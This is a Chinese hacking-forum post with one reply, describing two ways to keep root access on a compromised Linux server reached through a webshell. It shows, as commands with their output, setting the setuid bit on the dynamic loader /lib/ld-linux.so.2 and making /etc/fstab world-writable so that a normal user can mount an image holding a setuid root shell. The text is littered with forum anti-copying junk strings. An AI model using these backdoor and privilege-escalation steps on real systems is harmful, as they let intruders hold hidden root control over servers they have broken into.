找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3036|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
. p, O9 H2 p! b: G' W% n  }. Z
" @( h  Y0 x" O5 E[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究( `- y/ t7 j1 S) D1 V' J
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
. F% d- Y0 Q% @9 H7 e2 |lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究3 y2 A; c) q7 A  _' o
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
3 J" o; r0 E! Y# s" J, ?3 s: ], I[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
, C$ _, @  x$ F1 ^* d-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究& b& n" X! ?$ @! M  P4 E
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
+ I# G& O% P( r* s, A5 ~' h! J- ?[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
8 K+ l0 w; ^5 j. z& ^( r我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究( D$ J3 o5 p2 b

; n$ Q, [  f" p9 w; s7 Z普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
+ D! C( z, k: ]% v! A* f
- \1 f% P' x8 z% v5 m2 i[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
$ a* _8 ^. ?% }5 Dxiaoyu2ezX-BUG-关注前沿信息安全技术研究
8 l9 u+ E5 w( A2 l7 I+ b[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
0 ~$ ]" J; J+ a4 j+ V, F+ nroot2ezX-BUG-关注前沿信息安全技术研究
' _& @7 ~% U# m6 F[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
6 w$ Z4 ^% E3 g0 i恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究0 w3 A% h* r6 ?$ W

0 b. Q/ K, A4 T1 a+ d5 A, \3 Y方法二:2ezX-BUG-关注前沿信息安全技术研究2 l$ x+ @) R" D1 F. N" @

& e% }& A8 x% J1 J# U# K看过程:2ezX-BUG-关注前沿信息安全技术研究
* Q3 o+ K% ^& g! l1 u9 ?+ j$ \- c- d
" `2 v' l; E# O; t% T8 t[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究1 K5 J+ n) {0 D# m* y2 G5 S5 @
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
$ x1 R6 h0 g/ V- e& k% H! R8 u2 y6 p9 C9 H- F+ L
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
8 Z( Y; }' p  R* j' s: V( U9 Q5 w- N" o9 T9 }6 s* `  e( E+ a
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究* p' B6 j6 u7 l. J  {7 `
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究# A7 O! f0 h/ @2 E
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究( p! \) e, ]% |0 F
9 _5 H  [$ h5 y& W
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究2 c; o. x; M6 I3 W3 Y7 [
+ ]5 A% Q# s$ O% R$ M/ _' h% A
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究' u0 W5 }3 M" W
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
" j1 G( b9 O5 a! C7 M. a[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究; F( I; S, D) \& |/ ]
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究7 i" v1 f" B* o: j  a9 l
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
$ F/ Y# J9 C1 b% H1 H# b6 o5 jtotal 182ezX-BUG-关注前沿信息安全技术研究2 `9 U  G8 H5 x- P5 ?: r& K
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究# k& [0 _2 k2 z6 @; f4 u
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究9 Y# u1 h$ n# M) z) V. l  f
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
& |  P! G2 E! g& {sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
4 N8 E0 Q4 d9 s& t9 ~* S看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
" Z9 q9 J1 S: t& D) {8 stest这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究) d' o7 u* {. Q0 N
1 U6 E; \# a/ c1 k$ W; ~. c
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究% e5 u" w3 t/ ]4 a
2ezX-BUG-关注前沿信息安全技术研究0 |6 h% O# J, y$ [1 L- t9 j

& J5 u/ v) P+ O) n* [
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表